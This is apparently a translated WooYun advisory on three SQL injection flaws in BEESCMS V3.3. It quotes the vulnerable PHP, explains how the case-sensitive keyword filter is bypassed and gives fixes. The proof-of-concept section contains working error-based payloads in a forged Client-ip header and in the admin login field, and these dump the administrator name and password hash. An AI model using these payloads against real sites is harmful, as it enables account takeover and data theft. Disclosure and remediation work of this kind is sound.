
Vulnerability summary

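Bug ID: wooyun-2014-055608

Title: BEESCMS enterprise website management system SQL injection 1

Vendor: beescms.com

Author: xfkxfk

Submitted: 2014-04-12 09:25

Fixed: 2014-07-08 09:26

Disclosed: 2014-07-08 09:26

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]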


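Vulnerability details

Disclosure status:

2014-04-12: Details reported to the vendor; awaiting vendor handling
2014-04-17: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-06-11: Details disclosed to core white hats and experts in related fields
2014-06-21: Details disclosed to regular white hats
2014-07-01: Details disclosed to trainee white hats
2014-07-08: Details disclosed to the public

Brief description:

SQL injection in BEESCMS enterprise website management system V3.3

Detailed description:

First vulnerability:
Official website: http://www.beescms.com/
Look at the file /member/member.php: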

// Handle user registration
elseif($action=='save_reg'){
    $user=fl_html(fl_value($_POST['user']));
    $password=fl_html(fl_value($_POST['password']));
    $password2=fl_html(fl_value($_POST['password2']));
    $nich=fl_html(fl_value($_POST['nich']));
    $mail=fl_html(fl_value($_POST['mail']));
    $code=fl_html(fl_value($_POST['code']));
    if(!$_sys['web_member'][0]){
        die("<script type=\"text/javascript\">alert('{$language['member_msg5']}');history.go(-1);</script>");
    }
    if(!check_str($user,'/^[a-zA-Z][a-zA-Z0-9]{3,15}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg6']}');history.go(-1);</script>");}
    if(!check_str($nich,'/^[a-zA-Z][a-zA-Z0-9]{3,15}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg7']}');history.go(-1);</script>");}
    if(empty($password)||empty($password2)){die("<script type=\"text/javascript\">alert('{$language['member_msg8']}');history.go(-1);</script>");}
    if($password!=$password2){die("<script type=\"text/javascript\">alert('{$language['member_msg9']}');history.go(-1);</script>");}
    if(!check_str($mail,'/^[0-9a-z]+@(([0-9a-z]+)[.])+[a-z]{2,3}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg10']}');history.go(-1);</script>");}
    if(!empty($_sys['member_no_name'])){$no_name=explode('|',$_sys['member_no_name']);}
    if(is_array($no_name)){
        if(in_array($user,$no_name)){die("<script type=\"text/javascript\">alert('【".$user."】{$language['member_msg11']}');history.go(-1);</script>");}
    }
    if(!empty($_sys['safe_open'])){
        foreach($_sys['safe_open'] as $k=>$v){
            if($v=='1'){
                if($code!=$_SESSION['code']){die("<script type=\"text/javascript\">alert('{$language['member_msg2']}');history.go(-1);</script>");}
            }
        }
    }


    $sql="select id from ".DB_PRE."member where member_user='{$user}'";
    if($GLOBALS['mysql']->fetch_rows($sql)){die($language['member_msg12']);}
    if(!$_sys['member_mail'][0]){
        $sql="select id from ".DB_PRE."member where member_mail='{$mail}'";
        if($GLOBALS['mysql']->fetch_rows($sql)){die($mail.$language['member_msg13']);}
    }
    $addtime=time();
    $password=md5($password);
    $sql="insert into ".DB_PRE."member (member_user,member_password,member_nich,member_mail,member_purview) values ('{$user}','{$password}','{$nich}','{$mail}',1)";
    $GLOBALS['mysql']->query($sql);
    $last_id=$GLOBALS['mysql']->insert_id();
    // get_ip() returns a request header value; only fl_value and fl_html stand between it and the query
    $ip=fl_html(fl_value(get_ip()));
    // $ip is placed inside a single-quoted SQL literal
    $sql="update ".DB_PRE."member set member_time='{$addtime}',member_ip='{$ip}' where id={$last_id}";
    $GLOBALS['mysql']->query($sql);
    die("<script type=\"text/javascript\">alert('{$language['member_msg14']}');location.href='member.php?action=login&lang=".$lang."';</script>");
}


Note the line
$ip=fl_html(fl_value(get_ip()));
whose result then goes straight into the UPDATE statement.
Now look at the functions involved:

function get_ip(){
    if(!empty($_SERVER['HTTP_CLIENT_IP']))
    {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        return $_SERVER['REMOTE_ADDR'];
    }
}
......
function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/','',$str);
}
function fl_html($str){
    return htmlspecialchars($str);
}


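get_ip performs no filtering at all and returns the header value directly.
fl_value can be bypassed by using uppercase, because its pattern is matched case-sensitively.
fl_html only escapes HTML entities, which does not affect our injection (with the default flags of PHP versions before 8.1, htmlspecialchars leaves single quotes unescaped).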
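
The filter behaviour described above can be checked directly. This is an added example, not code from the report or from BEESCMS: fl_value() and fl_html() follow the excerpt, filter_gaps() and the sample strings are constructed for illustration, and ENT_COMPAT is passed explicitly to reproduce the htmlspecialchars() default of PHP versions before 8.1.

```php
<?php
// Added example. fl_value() and fl_html() follow the excerpt above; ENT_COMPAT
// is passed explicitly because it was the htmlspecialchars() default before
// PHP 8.1, which is the behaviour the report describes.
function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/','',$str);
}
function fl_html($str){
    return htmlspecialchars((string)$str, ENT_COMPAT);
}

// Hypothetical helper: report what still reaches the SQL string after both
// filters have run.
function filter_gaps(string $input): array
{
    $out  = fl_html(fl_value($input));
    $gaps = [];
    if (strpos($out, "'") !== false) {
        $gaps[] = 'single quote kept: value can close the quoted SQL literal';
    }
    if (preg_match('/\b(select|union|from|where)\b/i', $out, $m)) {
        $gaps[] = "keyword kept: {$m[1]}";
    }
    return $gaps;
}

// Constructed inputs: the same word in different case, plus a lone quote.
$samples = ["a select b", "a SELECT b", "a SeLeCt b", "o'brien"];
foreach ($samples as $s) {
    $gaps = filter_gaps($s);
    printf("%-12s => %s\n", $s, $gaps ? implode('; ', $gaps) : 'nothing flagged');
}
```

Only the all-lowercase sample is stripped; a keyword blacklist of this kind cannot substitute for bound parameters.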
Second vulnerability:
Official website: http://www.beescms.com/
Look at the file /mx_form/order_save.php:

$addtime=time();
$ip=fl_value(get_ip());
$ip=fl_html($ip);
$member_id=empty($_SESSION['id'])?0:$_SESSION['id'];
$arc_id=empty($f_id)?0:intval($_POST['f_id']);
$sql="insert into ".DB_PRE."formlist (form_id,form_time,form_ip,member_id,arc_id) values ({$form_id},{$addtime},'{$ip}','{$member_id}','{$arc_id}')";
$mysql->query($sql);
$last_id=$mysql->insert_id();
$sql_field='id'.$sql_field;
$sql_value=$last_id.$sql_value;
$sql="insert into ".DB_PRE."{$table} ({$sql_field}) values ({$sql_value})";
$mysql->query($sql);


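In the product center, when a product is ordered and the order is submitted, the IP is inserted into the table, which leads to SQL injection.
$ip=fl_value(get_ip());
$ip=fl_html($ip);
Now look at the functions involved: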

function get_ip(){
    if(!empty($_SERVER['HTTP_CLIENT_IP']))
    {
        return $_SERVER['HTTP_CLIENT_IP'];
    }
    elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        return $_SERVER['REMOTE_ADDR'];
    }
}
function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/','',$str);
}
function fl_html($str){
    return htmlspecialchars($str);
}


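get_ip performs no filtering at all and returns the header value directly.
fl_value can be bypassed by using uppercase.
fl_html only escapes HTML entities, which does not affect our injection.
Third vulnerability:
Official website: http://www.beescms.com/
The back-end (admin) login
File /admin/login.php: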

// Check login
elseif($action=='ck_login'){
    global $submit,$user,$password,$_sys,$code;
    $submit=$_POST['submit'];
    $user=fl_html(fl_value($_POST['user']));
    $password=fl_html(fl_value($_POST['password']));
    $code=$_POST['code'];
    if(!isset($submit)){
        msg('请从登陆页面进入'); // "Please enter from the login page"
    }
    if(empty($user)||empty($password)){
        msg("密码或用户名不能为空"); // "Password or user name must not be empty"
    }
    if(!empty($_sys['safe_open'])){
        foreach($_sys['safe_open'] as $k=>$v){
            if($v=='3'){
                if($code!=$s_code){msg("验证码不正确!");} // "Incorrect verification code!"
            }
        }
    }
    check_login($user,$password);


The POSTed username and password pass through the fl_html and fl_value filters:

function fl_value($str){
    if(empty($str)){return;}
    return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file|outfile/','',$str);
}
function fl_html($str){
    return htmlspecialchars($str);
}


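Looking at these two functions:
fl_value can be bypassed by using uppercase.
fl_html only escapes HTML entities, which does not affect our injection.
Execution then enters the check_login function: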

function check_login($user,$password){
    // $user is concatenated into the query inside single quotes
    $rel=$GLOBALS['mysql']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");
    $rel=empty($rel)?'':$rel[0];
    if(empty($rel)){
        msg('不存在该管理用户','login.php'); // "This admin user does not exist"
    }
    $password=md5($password);
    if($password!=$rel['admin_password']){
        msg("输入的密码不正确"); // "The password entered is incorrect"
    }
    if($rel['is_disable']){
        msg('该账号已经被锁定,无法登陆'); // "This account is locked and cannot log in"
    }

    $_SESSION['admin']=$rel['admin_name'];
    $_SESSION['admin_purview']=$rel['admin_purview'];
    $_SESSION['admin_id']=$rel['id'];
    $_SESSION['admin_time']=time();
    $_SESSION['login_in']=1;
    $_SESSION['login_time']=time();
    $ip=fl_value(get_ip());
    $ip=fl_html($ip);
    $_SESSION['admin_ip']=$ip;
    unset($rel);
    header("location:admin.php");
}


In summary, although the POSTed content is filtered, the filter can be bypassed.
Once it is bypassed, the injection is still present.

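Proof of vulnerability:

First vulnerability:
Intercept the request during registration, forge the header information, and add the following header: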
Client-ip: 1.1.1.1' AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#

[screenshot: e.png]


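Second vulnerability:
When ordering a product and submitting the order, intercept the request, modify the headers to add Client-ip, and send the following request: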

POST /beescms/mx_form/order_save.php HTTP/1.1
Host: localhost
Client-ip: 127.0.0.1',(SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b))#
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

form_id=5&fields[mail]=&fields[username]=test111&fields[tel]=13111111111&fields[web_contact][email protected]&fields[address]=111111&fields[content]=111111&lang=cn&f_id=21&submit=%E6%8F%90%E4%BA%A4


The administrator account is dumped successfully:

[screenshot: f.png]


Third vulnerability:
At the back-end login, send the request:
URL:
http://localhost/beescms/admin/login.php?action=ck_login
POST:
user=admin' UNION (SELECT 1,2,3,4,5 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#&password=admin&code=bc27&submit=true&submit.x=28&submit.y=21
The administrator account is dumped successfully:

[screenshot: g.png]

Fix:

Filter the content taken from the server variables ($_SERVER).
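
One way to implement this fix for the IP fields of the first two issues and the login lookup of the third, as an added example that is not BEESCMS code: client_ip(), the trusted-proxy list and the simplified member table are assumptions, and an in-memory SQLite database (pdo_sqlite) stands in for MySQL so the snippet runs offline.

```php
<?php
// Added example, not BEESCMS code. client_ip(), the proxy list and the
// simplified member table are assumptions made for illustration.

// Return a validated client address. Client-IP is never read, and
// X-Forwarded-For is honoured only when the peer is a proxy we operate.
function client_ip(array $server, array $trustedProxies = []): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (in_array($peer, $trustedProxies, true)) {
        // Right-most entry: the one appended by our own proxy.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? '');
        $candidate = trim(end($parts));
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    // Anything that is not a syntactically valid address is discarded.
    return filter_var($peer, FILTER_VALIDATE_IP) !== false ? $peer : '0.0.0.0';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member (id INTEGER PRIMARY KEY, member_user TEXT,
           member_time INTEGER, member_ip TEXT)');
$db->exec("INSERT INTO member (member_user) VALUES ('alice')");

// Constructed request: a direct client sends a Client-IP header that is
// not an address. It never reaches the database.
$server = [
    'REMOTE_ADDR'    => '203.0.113.7',
    'HTTP_CLIENT_IP' => "1.1.1.1' not-an-address",
];
$ip = client_ip($server);

// Values are bound as parameters, never interpolated into the SQL text.
$upd = $db->prepare('UPDATE member SET member_time = :t, member_ip = :ip WHERE id = :id');
$upd->execute([':t' => time(), ':ip' => $ip, ':id' => 1]);
echo 'stored ip: ', $db->query('SELECT member_ip FROM member WHERE id = 1')->fetchColumn(), "\n";

// Login lookup: a quote in the submitted name is data, so no row matches.
$sel = $db->prepare('SELECT id FROM member WHERE member_user = :u LIMIT 1');
$sel->execute([':u' => "alice' x"]);
echo 'lookup result: ', var_export($sel->fetchColumn(), true), "\n";
```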

Copyright notice: when reposting, please credit the source xfkxfk@WooYun


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2014-07-08 09:26

Vendor reply:

Latest status:

None